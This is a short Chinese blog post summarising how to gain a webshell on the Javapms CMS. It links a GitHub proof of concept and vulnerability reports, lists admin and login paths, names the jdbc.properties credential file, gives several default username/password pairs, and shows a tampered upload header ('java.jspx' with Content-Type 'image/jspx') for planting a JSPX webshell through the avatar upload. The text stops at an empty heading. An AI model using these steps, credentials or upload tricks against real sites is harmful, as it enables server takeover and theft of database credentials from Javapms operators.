对于Javapms-Getshell利用遇到的问题和利用方法总结
2017-03-29 本文已影响17人
简书这个地方快倒闭了
GITHUB地址:
https://github.com/Weiy-Geek/POC/tree/master/Javapms
powered by javapms
http://www.wooyun.org/bugs/wooyun-2010-077395 头像Getshell
http://www.wooyun.org/bugs/wooyun-2010-067865 存储型跨站结合CSRF可获取管理员权限+后台Getshell
http://drops.wooyun.org/tips/662 获取Jspx 菜刀shell、
/admin/login.do 后台管理 /login.jsp 登录 /reg.jsp 注册 /member/index.jsp 个人中心 /member/editInfo.jsp 修改头像
必须使用jspx 更改context-type: image/jspx
/webapps/ROOT/WEB-INF/config/jdbc/jdbc.properties
默认密码: admin javapms
test 123123 demo demo javapms a123123 korven 123123
抓包改包的: Content-Disposition: form-data; name="file"; filename="java.jspx" Content-Type: image/jspx
某论坛利用详细总结: